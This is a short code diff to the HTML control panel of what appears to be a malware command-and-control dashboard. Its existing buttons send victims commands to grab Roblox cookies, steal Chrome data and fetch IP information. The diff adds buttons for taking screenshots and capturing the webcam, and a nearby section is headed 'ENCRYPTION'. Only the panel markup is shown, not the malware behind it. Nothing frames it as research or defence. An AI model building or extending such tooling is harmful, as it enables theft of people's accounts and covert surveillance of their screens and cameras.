--- a/dashboard/panel.html
+++ b/dashboard/panel.html
@@ -296,6 +296,9 @@
                     <button class="btn-warn" style="background-color: #a855f7; border: none; color: white;" onclick="cmd('grab_roblox')"></i> Roblox Cookie</button>
                     <button class="btn-warn full-width" style="background-color: #a855f7; border: none; color: white;" onclick="cmd('chrome_steal')">Steal Chrome</button>
                     <button class="btn-info full-width" style="background-color: #a855f7; border: none; color: white;" onclick="cmd('get_ip')">Get IP Info</button>
+                    <button class="btn-info full-width" style="background-color: #a855f7; border: none; color: white;" onclick="cmd('screenshot')">Screenshot</button>
+                    <button class="btn-warn full-width" style="background-color: #a855f7; border: none; color: white;" onclick="cmd('webcam')">Webcam</button>
+
                 </div>
             </div>
             <!-- 4. ENCRYPTION -->
